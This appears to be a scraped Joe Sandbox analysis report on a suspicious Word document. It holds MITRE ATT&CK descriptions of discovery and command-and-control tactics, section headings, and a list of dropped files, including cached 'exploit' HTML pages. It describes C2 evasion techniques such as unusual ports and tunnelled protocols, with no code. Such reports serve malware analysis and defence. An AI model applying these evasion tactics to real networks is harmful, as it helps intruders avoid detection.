Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZDhoKQk8G6.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A40B0AC-ACBB-463B-8DC0-568E01ED388D}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FD4A456-B142-48A7-8A26-7CC29A810637}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\exploit[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\722BFA5.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7341AC3F.htm

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B14BFC0.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F20135FB.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{365EE8EB-26DD-4793-A79E-4CD05254F7C9}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F1199C9-FFD7-4240-8F04-53D52631A074}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3D2E09D-939E-4CE8-8CEF-3005BD062461}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F2A88E0D-A9AE-4C78-97ED-928ECF332904}.tmp

C:\Users\user\AppData\Local\Temp\{4EBE4D7B-7080-4C78-9E4E-C39E5F92BCD0}

C:\Users\user\AppData\Local\Temp\{6B16DF9D-3276-41E2-93CB-F148AEE50BE1}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ZDhoKQk8G6.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$hoKQk8G6.docx

Static File Info

General

Windows Analysis Report
ZDhoKQk8G6.docx